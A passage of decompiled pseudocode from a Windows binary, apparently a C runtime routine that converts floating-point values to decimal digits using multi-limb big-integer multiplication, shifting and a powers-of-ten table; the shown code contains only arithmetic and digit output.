														_v1884 = _t1111;
														_t1261 = _t1219 << 2;
														E00A4FFF0(_t1219,  &_v1396, 0, _t1261);
														 *(_t1271 + _t1261 - 0x570) = 1 << (_v1884 & 0x0000001f);
														_t805 = _t1219 + 1;
													}
													goto L128;
												}
											}
											goto L101;
										}
										L128:
										_v1400 = _t805;
										_t1064 = 0x1cc;
										_v936 = _t805;
										__eflags = _t805 << 2;
										E00A5BDE1( &_v932, 0x1cc,  &_v1396, _t805 << 2);
										_t1277 =  &(_t1274[7]);
									} else {
										_v1396 = _v1396 & 0x00000000;
										_t1262 = 2;
										_v1392 = 0x100000;
										_v1400 = _t1262;
										__eflags = _t1061 - _t1262;
										if(_t1061 != _t1262) {
											L53:
											_t992 = _v1872 + 1;
											_t993 = _t992 & 0x0000001f;
											_t1114 = 0x20;
											_v1876 = _t993;
											_t1221 = _t992 >> 5;
											_v1872 = _t1221;
											_v1908 = _t1114 - _t993;
											_t996 = E00A4F0C0(1, _t1114 - _t993, 0);
											_t1116 =  *((intOrPtr*)(_t1271 + _t1061 * 4 - 0x1d4));
											_t997 = _t996 - 1;
											_t108 =  &_v1896;
											 *_t108 = _v1896 & 0x00000000;
											__eflags =  *_t108;
											asm("bsr ecx, ecx");
											_v1884 = _t997;
											_v1912 =  !_t997;
											if( *_t108 == 0) {
												_t1117 = 0;
												__eflags = 0;
											} else {
												_t1117 = _t1116 + 1;
											}
											_t999 = 0x20;
											_t1000 = _t999 - _t1117;
											_t1179 = _t1061 + _t1221;
											__eflags = _v1876 - _t1000;
											_v1892 = _t1179;
											_t1001 = _t1000 & 0xffffff00 | _v1876 - _t1000 > 0x00000000;
											__eflags = _t1179 - 0x73;
											_v1865 = _t1001;
											_t1118 = _t1117 & 0xffffff00 | _t1179 - 0x00000073 > 0x00000000;
											__eflags = _t1179 - 0x73;
											if(_t1179 != 0x73) {
												L59:
												_t1002 = 0;
												__eflags = 0;
											} else {
												__eflags = _t1001;
												if(_t1001 == 0) {
													goto L59;
												} else {
													_t1002 = 1;
												}
											}
											__eflags = _t1118;
											if(_t1118 != 0) {
												L81:
												__eflags = 0;
												_t1064 = 0x1cc;
												_v1400 = 0;
												_v472 = 0;
												E00A5BDE1( &_v468, 0x1cc,  &_v1396, 0);
												_t1274 =  &(_t1274[4]);
											} else {
												__eflags = _t1002;
												if(_t1002 != 0) {
													goto L81;
												} else {
													_t1119 = 0x72;
													__eflags = _t1179 - _t1119;
													if(_t1179 >= _t1119) {
														_t1179 = _t1119;
														_v1892 = _t1119;
													}
													_t1012 = _t1179;
													_v1880 = _t1012;
													__eflags = _t1179 - 0xffffffff;
													if(_t1179 != 0xffffffff) {
														_t1180 = _v1872;
														_t1264 = _t1179 - _t1180;
														__eflags = _t1264;
														_t1123 =  &_v468 + _t1264 * 4;
														_v1888 = _t1123;
														while(1) {
															__eflags = _t1012 - _t1180;
															if(_t1012 < _t1180) {
																break;
															}
															__eflags = _t1264 - _t1061;
															if(_t1264 >= _t1061) {
																_t1224 = 0;
																__eflags = 0;
															} else {
																_t1224 =  *_t1123;
															}
															__eflags = _t1264 - 1 - _t1061;
															if(_t1264 - 1 >= _t1061) {
																_t1017 = 0;
																__eflags = 0;
															} else {
																_t1017 =  *(_t1123 - 4);
															}
															_t1020 = _v1880;
															_t1123 = _v1888 - 4;
															_v1888 = _t1123;
															 *(_t1271 + _t1020 * 4 - 0x1d0) = (_t1224 & _v1884) << _v1876 | (_t1017 & _v1912) >> _v1908;
															_t1012 = _t1020 - 1;
															_t1264 = _t1264 - 1;
															_v1880 = _t1012;
															__eflags = _t1012 - 0xffffffff;
															if(_t1012 != 0xffffffff) {
																_t1061 = _v472;
																continue;
															}
															break;
														}
														_t1179 = _v1892;
														_t1221 = _v1872;
														_t1262 = 2;
													}
													__eflags = _t1221;
													if(_t1221 != 0) {
														__eflags = 0;
														memset( &_v468, 0, _t1221 << 2);
														_t1274 =  &(_t1274[3]);
													}
													__eflags = _v1865;
													_t1064 = 0x1cc;
													if(_v1865 == 0) {
														_v472 = _t1179;
													} else {
														_v472 = _t1179 + 1;
													}
												}
											}
											_v1392 = _v1392 & 0x00000000;
											_v1396 = _t1262;
											_v1400 = 1;
											_v936 = 1;
											_push(4);
										} else {
											_t1127 = 0;
											__eflags = 0;
											while(1) {
												__eflags =  *((intOrPtr*)(_t1271 + _t1127 - 0x570)) -  *((intOrPtr*)(_t1271 + _t1127 - 0x1d0));
												if( *((intOrPtr*)(_t1271 + _t1127 - 0x570)) !=  *((intOrPtr*)(_t1271 + _t1127 - 0x1d0))) {
													goto L53;
												}
												_t1127 = _t1127 + 4;
												__eflags = _t1127 - 8;
												if(_t1127 != 8) {
													continue;
												} else {
													_t1023 = _v1872 + 2;
													_t1024 = _t1023 & 0x0000001f;
													_t1128 = 0x20;
													_t1129 = _t1128 - _t1024;
													_v1888 = _t1024;
													_t1266 = _t1023 >> 5;
													_v1876 = _t1266;
													_v1908 = _t1129;
													_t1027 = E00A4F0C0(1, _t1129, 0);
													_v1896 = _v1896 & 0x00000000;
													_t1028 = _t1027 - 1;
													__eflags = _t1028;
													asm("bsr ecx, edi");
													_v1884 = _t1028;
													_v1912 =  !_t1028;
													if(_t1028 == 0) {
														_t1130 = 0;
														__eflags = 0;
													} else {
														_t1130 = _t1129 + 1;
													}
													_t1030 = 0x20;
													_t1031 = _t1030 - _t1130;
													_t1182 = _t1266 + 2;
													__eflags = _v1888 - _t1031;
													_v1880 = _t1182;
													_t1032 = _t1031 & 0xffffff00 | _v1888 - _t1031 > 0x00000000;
													__eflags = _t1182 - 0x73;
													_v1865 = _t1032;
													_t1131 = _t1130 & 0xffffff00 | _t1182 - 0x00000073 > 0x00000000;
													__eflags = _t1182 - 0x73;
													if(_t1182 != 0x73) {
														L28:
														_t1033 = 0;
														__eflags = 0;
													} else {
														__eflags = _t1032;
														if(_t1032 == 0) {
															goto L28;
														} else {
															_t1033 = 1;
														}
													}
													__eflags = _t1131;
													if(_t1131 != 0) {
														L50:
														__eflags = 0;
														_t1064 = 0x1cc;
														_v1400 = 0;
														_v472 = 0;
														E00A5BDE1( &_v468, 0x1cc,  &_v1396, 0);
														_t1274 =  &(_t1274[4]);
													} else {
														__eflags = _t1033;
														if(_t1033 != 0) {
															goto L50;
														} else {
															_t1134 = 0x72;
															__eflags = _t1182 - _t1134;
															if(_t1182 >= _t1134) {
																_t1182 = _t1134;
																_v1880 = _t1134;
															}
															_t1135 = _t1182;
															_v1892 = _t1135;
															__eflags = _t1182 - 0xffffffff;
															if(_t1182 != 0xffffffff) {
																_t1183 = _v1876;
																_t1268 = _t1182 - _t1183;
																__eflags = _t1268;
																_t1043 =  &_v468 + _t1268 * 4;
																_v1872 = _t1043;
																while(1) {
																	__eflags = _t1135 - _t1183;
																	if(_t1135 < _t1183) {
																		break;
																	}
																	__eflags = _t1268 - _t1061;
																	if(_t1268 >= _t1061) {
																		_t1230 = 0;
																		__eflags = 0;
																	} else {
																		_t1230 =  *_t1043;
																	}
																	__eflags = _t1268 - 1 - _t1061;
																	if(_t1268 - 1 >= _t1061) {
																		_t1045 = 0;
																		__eflags = 0;
																	} else {
																		_t1045 =  *(_v1872 - 4);
																	}
																	_t1140 = _v1892;
																	 *(_t1271 + _t1140 * 4 - 0x1d0) = (_t1045 & _v1912) >> _v1908 | (_t1230 & _v1884) << _v1888;
																	_t1135 = _t1140 - 1;
																	_t1268 = _t1268 - 1;
																	_t1043 = _v1872 - 4;
																	_v1892 = _t1135;
																	_v1872 = _t1043;
																	__eflags = _t1135 - 0xffffffff;
																	if(_t1135 != 0xffffffff) {
																		_t1061 = _v472;
																		continue;
																	}
																	break;
																}
																_t1182 = _v1880;
																_t1266 = _v1876;
															}
															__eflags = _t1266;
															if(_t1266 != 0) {
																__eflags = 0;
																memset( &_v468, 0, _t1266 << 2);
																_t1274 =  &(_t1274[3]);
															}
															__eflags = _v1865;
															_t1064 = 0x1cc;
															if(_v1865 == 0) {
																_v472 = _t1182;
															} else {
																_v472 = _t1182 + 1;
															}
														}
													}
													_v1392 = _v1392 & 0x00000000;
													_t1038 = 4;
													__eflags = 1;
													_v1396 = _t1038;
													_v1400 = 1;
													_v936 = 1;
													_push(_t1038);
												}
												goto L52;
											}
											goto L53;
										}
										L52:
										_push( &_v1396);
										_push(_t1064);
										_push( &_v932);
										E00A5BDE1();
										_t1277 =  &(_t1274[4]);
									}
									_t810 = _v1904;
									_t1084 = 0xa;
									_v1912 = _t1084;
									__eflags = _t810;
									if(_t810 < 0) {
										_t811 =  ~_t810;
										_t812 = _t811 / _t1084;
										_v1880 = _t812;
										_t1085 = _t811 % _t1084;
										_v1884 = _t1085;
										__eflags = _t812;
										if(_t812 == 0) {
											L249:
											__eflags = _t1085;
											if(_t1085 != 0) {
												_t849 =  *(0xa683dc + _t1085 * 4);
												_v1896 = _t849;
												__eflags = _t849;
												if(_t849 == 0) {
													L260:
													__eflags = 0;
													_push(0);
													_v472 = 0;
													_v2408 = 0;
													goto L261;
												} else {
													__eflags = _t849 - 1;
													if(_t849 != 1) {
														_t1096 = _v472;
														__eflags = _t1096;
														if(_t1096 != 0) {
															_t1199 = 0;
															_t1248 = 0;
															__eflags = 0;
															do {
																_t1153 = _t849 *  *(_t1271 + _t1248 * 4 - 0x1d0) >> 0x20;
																 *(_t1271 + _t1248 * 4 - 0x1d0) = _t849 *  *(_t1271 + _t1248 * 4 - 0x1d0) + _t1199;
																_t849 = _v1896;
																asm("adc edx, 0x0");
																_t1248 = _t1248 + 1;
																_t1199 = _t1153;
																__eflags = _t1248 - _t1096;
															} while (_t1248 != _t1096);
															__eflags = _t1199;
															if(_t1199 != 0) {
																_t856 = _v472;
																__eflags = _t856 - 0x73;
																if(_t856 >= 0x73) {
																	goto L260;
																} else {
																	 *(_t1271 + _t856 * 4 - 0x1d0) = _t1199;
																	_v472 = _v472 + 1;
																}
															}
														}
													}
												}
											}
										} else {
											do {
												__eflags = _t812 - 0x26;
												if(_t812 > 0x26) {
													_t812 = 0x26;
												}
												_t1097 =  *(0xa68346 + _t812 * 4) & 0x000000ff;
												_v1872 = _t812;
												_v1400 = ( *(0xa68346 + _t812 * 4) & 0x000000ff) + ( *(0xa68347 + _t812 * 4) & 0x000000ff);
												E00A4FFF0(_t1097 << 2,  &_v1396, 0, _t1097 << 2);
												_t867 = E00A50320( &(( &_v1396)[_t1097]), 0xa67a40 + ( *(0xa68344 + _v1872 * 4) & 0x0000ffff) * 4, ( *(0xa68347 + _t812 * 4) & 0x000000ff) << 2);
												_t1098 = _v1400;
												_t1277 =  &(_t1277[6]);
												_v1892 = _t1098;
												__eflags = _t1098 - 1;
												if(_t1098 > 1) {
													__eflags = _v472 - 1;
													if(_v472 > 1) {
														__eflags = _t1098 - _v472;
														_t1202 =  &_v1396;
														_t868 = _t867 & 0xffffff00 | _t1098 - _v472 > 0x00000000;
														__eflags = _t868;
														if(_t868 != 0) {
															_t1154 =  &_v468;
														} else {
															_t1202 =  &_v468;
															_t1154 =  &_v1396;
														}
														_v1908 = _t1154;
														__eflags = _t868;
														if(_t868 == 0) {
															_t1098 = _v472;
														}
														_v1876 = _t1098;
														__eflags = _t868;
														if(_t868 != 0) {
															_v1892 = _v472;
														}
														_t1155 = 0;
														_t1250 = 0;
														_v1864 = 0;
														__eflags = _t1098;
														if(_t1098 == 0) {
															L243:
															_v472 = _t1155;
															_t870 = _t1155 << 2;
															__eflags = _t870;
															_push(_t870);
															_t871 =  &_v1860;
															goto L244;
														} else {
															_t1203 = _t1202 -  &_v1860;
															__eflags = _t1203;
															_v1928 = _t1203;
															do {
																_t878 =  *(_t1271 + _t1203 + _t1250 * 4 - 0x740);
																_v1896 = _t878;
																__eflags = _t878;
																if(_t878 != 0) {
																	_t879 = 0;
																	_t1204 = 0;
																	_t1099 = _t1250;
																	_v1888 = 0;
																	__eflags = _v1892;
																	if(_v1892 == 0) {
																		L240:
																		__eflags = _t1099 - 0x73;
																		if(_t1099 == 0x73) {
																			goto L258;
																		} else {
																			_t1203 = _v1928;
																			_t1098 = _v1876;
																			goto L242;
																		}
																	} else {
																		while(1) {
																			__eflags = _t1099 - 0x73;
																			if(_t1099 == 0x73) {
																				goto L235;
																			}
																			__eflags = _t1099 - _t1155;
																			if(_t1099 == _t1155) {
																				 *(_t1271 + _t1099 * 4 - 0x740) =  *(_t1271 + _t1099 * 4 - 0x740) & 0x00000000;
																				_t891 = _t879 + 1 + _t1250;
																				__eflags = _t891;
																				_v1864 = _t891;
																				_t879 = _v1888;
																			}
																			_t886 =  *(_v1908 + _t879 * 4);
																			asm("adc edx, 0x0");
																			 *(_t1271 + _t1099 * 4 - 0x740) =  *(_t1271 + _t1099 * 4 - 0x740) + _t886 * _v1896 + _t1204;
																			asm("adc edx, 0x0");
																			_t879 = _v1888 + 1;
																			_t1099 = _t1099 + 1;
																			_v1888 = _t879;
																			_t1204 = _t886 * _v1896 >> 0x20;
																			_t1155 = _v1864;
																			__eflags = _t879 - _v1892;
																			if(_t879 != _v1892) {
																				continue;
																			} else {
																				goto L235;
																			}
																			while(1) {
																				L235:
																				__eflags = _t1204;
																				if(_t1204 == 0) {
																					goto L240;
																				}
																				__eflags = _t1099 - 0x73;
																				if(_t1099 == 0x73) {
																					goto L258;
																				} else {
																					__eflags = _t1099 - _t1155;
																					if(_t1099 == _t1155) {
																						_t558 = _t1271 + _t1099 * 4 - 0x740;
																						 *_t558 =  *(_t1271 + _t1099 * 4 - 0x740) & 0x00000000;
																						__eflags =  *_t558;
																						_t564 = _t1099 + 1; // 0x1
																						_v1864 = _t564;
																					}
																					_t884 = _t1204;
																					_t1204 = 0;
																					 *(_t1271 + _t1099 * 4 - 0x740) =  *(_t1271 + _t1099 * 4 - 0x740) + _t884;
																					_t1155 = _v1864;
																					asm("adc edi, edi");
																					_t1099 = _t1099 + 1;
																					continue;
																				}
																				goto L246;
																			}
																			goto L240;
																		}
																		goto L235;
																	}
																} else {
																	__eflags = _t1250 - _t1155;
																	if(_t1250 == _t1155) {
																		 *(_t1271 + _t1250 * 4 - 0x740) =  *(_t1271 + _t1250 * 4 - 0x740) & _t878;
																		_t526 = _t1250 + 1; // 0x1
																		_t1155 = _t526;
																		_v1864 = _t1155;
																	}
																	goto L242;
																}
																goto L246;
																L242:
																_t1250 = _t1250 + 1;
																__eflags = _t1250 - _t1098;
															} while (_t1250 != _t1098);
															goto L243;
														}
													} else {
														_t1205 = _v468;
														_v472 = _t1098;
														E00A5BDE1( &_v468, _t1064,  &_v1396, _t1098 << 2);
														_t1277 =  &(_t1277[4]);
														__eflags = _t1205;
														if(_t1205 == 0) {
															goto L203;
														} else {
															__eflags = _t1205 - 1;
															if(_t1205 == 1) {
																goto L245;
															} else {
																__eflags = _v472;
																if(_v472 == 0) {
																	goto L245;
																} else {
																	_t1100 = 0;
																	_v1896 = _v472;
																	_t1251 = 0;
																	__eflags = 0;
																	do {
																		_t900 = _t1205;
																		_t1156 = _t900 *  *(_t1271 + _t1251 * 4 - 0x1d0) >> 0x20;
																		 *(_t1271 + _t1251 * 4 - 0x1d0) = _t900 *  *(_t1271 + _t1251 * 4 - 0x1d0) + _t1100;
																		asm("adc edx, 0x0");
																		_t1251 = _t1251 + 1;
																		_t1100 = _t1156;
																		__eflags = _t1251 - _v1896;
																	} while (_t1251 != _v1896);
																	goto L208;
																}
															}
														}
													}
												} else {
													_t1206 = _v1396;
													__eflags = _t1206;
													if(_t1206 != 0) {
														__eflags = _t1206 - 1;
														if(_t1206 == 1) {
															goto L245;
														} else {
															__eflags = _v472;
															if(_v472 == 0) {
																goto L245;
															} else {
																_t1101 = 0;
																_v1896 = _v472;
																_t1252 = 0;
																__eflags = 0;
																do {
																	_t905 = _t1206;
																	_t1157 = _t905 *  *(_t1271 + _t1252 * 4 - 0x1d0) >> 0x20;
																	 *(_t1271 + _t1252 * 4 - 0x1d0) = _t905 *  *(_t1271 + _t1252 * 4 - 0x1d0) + _t1101;
																	asm("adc edx, 0x0");
																	_t1252 = _t1252 + 1;
																	_t1101 = _t1157;
																	__eflags = _t1252 - _v1896;
																} while (_t1252 != _v1896);
																L208:
																__eflags = _t1100;
																if(_t1100 == 0) {
																	goto L245;
																} else {
																	_t903 = _v472;
																	__eflags = _t903 - 0x73;
																	if(_t903 >= 0x73) {
																		L258:
																		_v2408 = 0;
																		_v472 = 0;
																		E00A5BDE1( &_v468, _t1064,  &_v2404, 0);
																		_t1277 =  &(_t1277[4]);
																		_t874 = 0;
																	} else {
																		 *(_t1271 + _t903 * 4 - 0x1d0) = _t1100;
																		_v472 = _v472 + 1;
																		goto L245;
																	}
																}
															}
														}
													} else {
														L203:
														_v2408 = 0;
														_v472 = 0;
														_push(0);
														_t871 =  &_v2404;
														L244:
														_push(_t871);
														_push(_t1064);
														_push( &_v468);
														E00A5BDE1();
														_t1277 =  &(_t1277[4]);
														L245:
														_t874 = 1;
													}
												}
												L246:
												__eflags = _t874;
												if(_t874 == 0) {
													_v2408 = _v2408 & 0x00000000;
													_v472 = _v472 & 0x00000000;
													_push(0);
													L261:
													_push( &_v2404);
													_t852 =  &_v468;
													goto L262;
												} else {
													goto L247;
												}
												goto L263;
												L247:
												_t812 = _v1880 - _v1872;
												__eflags = _t812;
												_v1880 = _t812;
											} while (_t812 != 0);
											_t1085 = _v1884;
											goto L249;
										}
									} else {
										_t908 = _t810 / _t1084;
										_v1908 = _t908;
										_t1102 = _t810 % _t1084;
										_v1896 = _t1102;
										__eflags = _t908;
										if(_t908 == 0) {
											L184:
											__eflags = _t1102;
											if(_t1102 != 0) {
												_t1207 =  *(0xa683dc + _t1102 * 4);
												__eflags = _t1207;
												if(_t1207 != 0) {
													__eflags = _t1207 - 1;
													if(_t1207 != 1) {
														_t909 = _v936;
														_v1896 = _t909;
														__eflags = _t909;
														if(_t909 != 0) {
															_t1253 = 0;
															_t1103 = 0;
															__eflags = 0;
															do {
																_t910 = _t1207;
																_t1161 = _t910 *  *(_t1271 + _t1103 * 4 - 0x3a0) >> 0x20;
																 *(_t1271 + _t1103 * 4 - 0x3a0) = _t910 *  *(_t1271 + _t1103 * 4 - 0x3a0) + _t1253;
																asm("adc edx, 0x0");
																_t1103 = _t1103 + 1;
																_t1253 = _t1161;
																__eflags = _t1103 - _v1896;
															} while (_t1103 != _v1896);
															__eflags = _t1253;
															if(_t1253 != 0) {
																_t913 = _v936;
																__eflags = _t913 - 0x73;
																if(_t913 >= 0x73) {
																	goto L186;
																} else {
																	 *(_t1271 + _t913 * 4 - 0x3a0) = _t1253;
																	_v936 = _v936 + 1;
																}
															}
														}
													}
												} else {
													L186:
													_v2408 = 0;
													_v936 = 0;
													_push(0);
													goto L190;
												}
											}
										} else {
											do {
												__eflags = _t908 - 0x26;
												if(_t908 > 0x26) {
													_t908 = 0x26;
												}
												_t1104 =  *(0xa68346 + _t908 * 4) & 0x000000ff;
												_v1888 = _t908;
												_v1400 = ( *(0xa68346 + _t908 * 4) & 0x000000ff) + ( *(0xa68347 + _t908 * 4) & 0x000000ff);
												E00A4FFF0(_t1104 << 2,  &_v1396, 0, _t1104 << 2);
												_t926 = E00A50320( &(( &_v1396)[_t1104]), 0xa67a40 + ( *(0xa68344 + _v1888 * 4) & 0x0000ffff) * 4, ( *(0xa68347 + _t908 * 4) & 0x000000ff) << 2);
												_t1105 = _v1400;
												_t1277 =  &(_t1277[6]);
												_v1892 = _t1105;
												__eflags = _t1105 - 1;
												if(_t1105 > 1) {
													__eflags = _v936 - 1;
													if(_v936 > 1) {
														__eflags = _t1105 - _v936;
														_t1210 =  &_v1396;
														_t927 = _t926 & 0xffffff00 | _t1105 - _v936 > 0x00000000;
														__eflags = _t927;
														if(_t927 != 0) {
															_t1162 =  &_v932;
														} else {
															_t1210 =  &_v932;
															_t1162 =  &_v1396;
														}
														_v1876 = _t1162;
														__eflags = _t927;
														if(_t927 == 0) {
															_t1105 = _v936;
														}
														_v1880 = _t1105;
														__eflags = _t927;
														if(_t927 != 0) {
															_v1892 = _v936;
														}
														_t1163 = 0;
														_t1255 = 0;
														_v1864 = 0;
														__eflags = _t1105;
														if(_t1105 == 0) {
															L177:
															_v936 = _t1163;
															_t929 = _t1163 << 2;
															__eflags = _t929;
															goto L178;
														} else {
															_t1211 = _t1210 -  &_v1860;
															__eflags = _t1211;
															_v1928 = _t1211;
															do {
																_t937 =  *(_t1271 + _t1211 + _t1255 * 4 - 0x740);
																_v1884 = _t937;
																__eflags = _t937;
																if(_t937 != 0) {
																	_t938 = 0;
																	_t1212 = 0;
																	_t1106 = _t1255;
																	_v1872 = 0;
																	__eflags = _v1892;
																	if(_v1892 == 0) {
																		L174:
																		__eflags = _t1106 - 0x73;
																		if(_t1106 == 0x73) {
																			goto L187;
																		} else {
																			_t1211 = _v1928;
																			_t1105 = _v1880;
																			goto L176;
																		}
																	} else {
																		while(1) {
																			__eflags = _t1106 - 0x73;
																			if(_t1106 == 0x73) {
																				goto L169;
																			}
																			__eflags = _t1106 - _t1163;
																			if(_t1106 == _t1163) {
																				 *(_t1271 + _t1106 * 4 - 0x740) =  *(_t1271 + _t1106 * 4 - 0x740) & 0x00000000;
																				_t950 = _t938 + 1 + _t1255;
																				__eflags = _t950;
																				_v1864 = _t950;
																				_t938 = _v1872;
																			}
																			_t945 =  *(_v1876 + _t938 * 4);
																			asm("adc edx, 0x0");
																			 *(_t1271 + _t1106 * 4 - 0x740) =  *(_t1271 + _t1106 * 4 - 0x740) + _t945 * _v1884 + _t1212;
																			asm("adc edx, 0x0");
																			_t938 = _v1872 + 1;
																			_t1106 = _t1106 + 1;
																			_v1872 = _t938;
																			_t1212 = _t945 * _v1884 >> 0x20;
																			_t1163 = _v1864;
																			__eflags = _t938 - _v1892;
																			if(_t938 != _v1892) {
																				continue;
																			} else {
																				goto L169;
																			}
																			while(1) {
																				L169:
																				__eflags = _t1212;
																				if(_t1212 == 0) {
																					goto L174;
																				}
																				__eflags = _t1106 - 0x73;
																				if(_t1106 == 0x73) {
																					L187:
																					__eflags = 0;
																					_v2408 = 0;
																					_v936 = 0;
																					_push(0);
																					_t940 =  &_v2404;
																					goto L188;
																				} else {
																					__eflags = _t1106 - _t1163;
																					if(_t1106 == _t1163) {
																						_t370 = _t1271 + _t1106 * 4 - 0x740;
																						 *_t370 =  *(_t1271 + _t1106 * 4 - 0x740) & 0x00000000;
																						__eflags =  *_t370;
																						_t376 = _t1106 + 1; // 0x1
																						_v1864 = _t376;
																					}
																					_t943 = _t1212;
																					_t1212 = 0;
																					 *(_t1271 + _t1106 * 4 - 0x740) =  *(_t1271 + _t1106 * 4 - 0x740) + _t943;
																					_t1163 = _v1864;
																					asm("adc edi, edi");
																					_t1106 = _t1106 + 1;
																					continue;
																				}
																				goto L181;
																			}
																			goto L174;
																		}
																		goto L169;
																	}
																} else {
																	__eflags = _t1255 - _t1163;
																	if(_t1255 == _t1163) {
																		 *(_t1271 + _t1255 * 4 - 0x740) =  *(_t1271 + _t1255 * 4 - 0x740) & _t937;
																		_t338 = _t1255 + 1; // 0x1
																		_t1163 = _t338;
																		_v1864 = _t1163;
																	}
																	goto L176;
																}
																goto L181;
																L176:
																_t1255 = _t1255 + 1;
																__eflags = _t1255 - _t1105;
															} while (_t1255 != _t1105);
															goto L177;
														}
													} else {
														_t1213 = _v932;
														_v936 = _t1105;
														E00A5BDE1( &_v932, _t1064,  &_v1396, _t1105 << 2);
														_t1277 =  &(_t1277[4]);
														__eflags = _t1213;
														if(_t1213 != 0) {
															__eflags = _t1213 - 1;
															if(_t1213 == 1) {
																goto L180;
															} else {
																__eflags = _v936;
																if(_v936 == 0) {
																	goto L180;
																} else {
																	_t1107 = 0;
																	_v1884 = _v936;
																	_t1256 = 0;
																	__eflags = 0;
																	do {
																		_t958 = _t1213;
																		_t1164 = _t958 *  *(_t1271 + _t1256 * 4 - 0x3a0) >> 0x20;
																		 *(_t1271 + _t1256 * 4 - 0x3a0) = _t958 *  *(_t1271 + _t1256 * 4 - 0x3a0) + _t1107;
																		asm("adc edx, 0x0");
																		_t1256 = _t1256 + 1;
																		_t1107 = _t1164;
																		__eflags = _t1256 - _v1884;
																	} while (_t1256 != _v1884);
																	goto L149;
																}
															}
														} else {
															_v1400 = 0;
															_v936 = 0;
															_push(0);
															_t930 =  &_v1396;
															goto L179;
														}
													}
												} else {
													_t1214 = _v1396;
													__eflags = _t1214;
													if(_t1214 != 0) {
														__eflags = _t1214 - 1;
														if(_t1214 == 1) {
															goto L180;
														} else {
															__eflags = _v936;
															if(_v936 == 0) {
																goto L180;
															} else {
																_t1108 = 0;
																_v1884 = _v936;
																_t1257 = 0;
																__eflags = 0;
																do {
																	_t965 = _t1214;
																	_t1165 = _t965 *  *(_t1271 + _t1257 * 4 - 0x3a0) >> 0x20;
																	 *(_t1271 + _t1257 * 4 - 0x3a0) = _t965 *  *(_t1271 + _t1257 * 4 - 0x3a0) + _t1108;
																	asm("adc edx, 0x0");
																	_t1257 = _t1257 + 1;
																	_t1108 = _t1165;
																	__eflags = _t1257 - _v1884;
																} while (_t1257 != _v1884);
																L149:
																__eflags = _t1107;
																if(_t1107 == 0) {
																	goto L180;
																} else {
																	_t961 = _v936;
																	__eflags = _t961 - 0x73;
																	if(_t961 < 0x73) {
																		 *(_t1271 + _t961 * 4 - 0x3a0) = _t1107;
																		_v936 = _v936 + 1;
																		goto L180;
																	} else {
																		_v1400 = 0;
																		_v936 = 0;
																		_push(0);
																		_t940 =  &_v1396;
																		L188:
																		_push(_t940);
																		_push(_t1064);
																		_push( &_v932);
																		E00A5BDE1();
																		_t1277 =  &(_t1277[4]);
																		_t933 = 0;
																	}
																}
															}
														}
													} else {
														_t929 = 0;
														_v1864 = 0;
														_v936 = 0;
														L178:
														_push(_t929);
														_t930 =  &_v1860;
														L179:
														_push(_t930);
														_push(_t1064);
														_push( &_v932);
														E00A5BDE1();
														_t1277 =  &(_t1277[4]);
														L180:
														_t933 = 1;
													}
												}
												L181:
												__eflags = _t933;
												if(_t933 == 0) {
													_v2408 = _v2408 & 0x00000000;
													_t404 =  &_v936;
													 *_t404 = _v936 & 0x00000000;
													__eflags =  *_t404;
													_push(0);
													L190:
													_push( &_v2404);
													_t852 =  &_v932;
													L262:
													_push(_t1064);
													_push(_t852);
													E00A5BDE1();
													_t1277 =  &(_t1277[4]);
												} else {
													goto L182;
												}
												goto L263;
												L182:
												_t908 = _v1908 - _v1888;
												__eflags = _t908;
												_v1908 = _t908;
											} while (_t908 != 0);
											_t1102 = _v1896;
											goto L184;
										}
									}
									L263:
									_t1194 = _v1920;
									_t1243 = _t1194;
									_t1086 = _v472;
									_v1872 = _t1243;
									__eflags = _t1086;
									if(_t1086 != 0) {
										_t1247 = 0;
										_t1198 = 0;
										__eflags = 0;
										do {
											_t841 =  *(_t1271 + _t1198 * 4 - 0x1d0);
											_t1151 = 0xa;
											_t1152 = _t841 * _t1151 >> 0x20;
											 *(_t1271 + _t1198 * 4 - 0x1d0) = _t841 * _t1151 + _t1247;
											asm("adc edx, 0x0");
											_t1198 = _t1198 + 1;
											_t1247 = _t1152;
											__eflags = _t1198 - _t1086;
										} while (_t1198 != _t1086);
										_v1896 = _t1247;
										__eflags = _t1247;
										_t1243 = _v1872;
										if(_t1247 != 0) {
											_t1095 = _v472;
											__eflags = _t1095 - 0x73;
											if(_t1095 >= 0x73) {
												__eflags = 0;
												_v2408 = 0;
												_v472 = 0;
												E00A5BDE1( &_v468, _t1064,  &_v2404, 0);
												_t1277 =  &(_t1277[4]);
											} else {
												 *(_t1271 + _t1095 * 4 - 0x1d0) = _t1152;
												_v472 = _v472 + 1;
											}
										}
										_t1194 = _t1243;
									}
									_t815 = E00A5D440( &_v472,  &_v936);
									_t1142 = 0xa;
									__eflags = _t815 - _t1142;
									if(_t815 != _t1142) {
										__eflags = _t815;
										if(_t815 != 0) {
											_t816 = _t815 + 0x30;
											__eflags = _t816;
											_t1243 = _t1194 + 1;
											 *_t1194 = _t816;
											_v1872 = _t1243;
											goto L282;
										} else {
											_t817 = _v1904 - 1;
										}
									} else {
										_v1904 = _v1904 + 1;
										_t1243 = _t1194 + 1;
										_t832 = _v936;
										 *_t1194 = 0x31;
										_v1872 = _t1243;
										__eflags = _t832;
										if(_t832 != 0) {
											_t1197 = 0;
											_t1246 = _t832;
											_t1094 = 0;
											__eflags = 0;
											do {
												_t833 =  *(_t1271 + _t1094 * 4 - 0x3a0);
												 *(_t1271 + _t1094 * 4 - 0x3a0) = _t833 * _t1142 + _t1197;
												asm("adc edx, 0x0");
												_t1094 = _t1094 + 1;
												_t1197 = _t833 * _t1142 >> 0x20;
												_t1142 = 0xa;
												__eflags = _t1094 - _t1246;
											} while (_t1094 != _t1246);
											_t1243 = _v1872;
											__eflags = _t1197;
											if(_t1197 != 0) {
												_t836 = _v936;
												__eflags = _t836 - 0x73;
												if(_t836 >= 0x73) {
													_v2408 = 0;
													_v936 = 0;
													E00A5BDE1( &_v932, _t1064,  &_v2404, 0);
													_t1277 =  &(_t1277[4]);
												} else {
													 *(_t1271 + _t836 * 4 - 0x3a0) = _t1197;
													_v936 = _v936 + 1;
												}
											}
										}
										L282:
										_t817 = _v1904;
									}
									 *((intOrPtr*)(_v1924 + 4)) = _t817;
									_t1070 = _v1916;
									__eflags = _t817;
									if(_t817 >= 0) {
										__eflags = _t1070 - 0x7fffffff;
										if(_t1070 <= 0x7fffffff) {
											_t1070 = _t1070 + _t817;
											__eflags = _t1070;
										}
									}
									_t819 = _a24 - 1;
									__eflags = _t819 - _t1070;
									if(_t819 >= _t1070) {
										_t819 = _t1070;
									}
									_t755 = _t819 + _v1920;
									_v1916 = _t755;
									__eflags = _t1243 - _t755;
									if(__eflags != 0) {
										while(1) {
											_t755 = _v472;
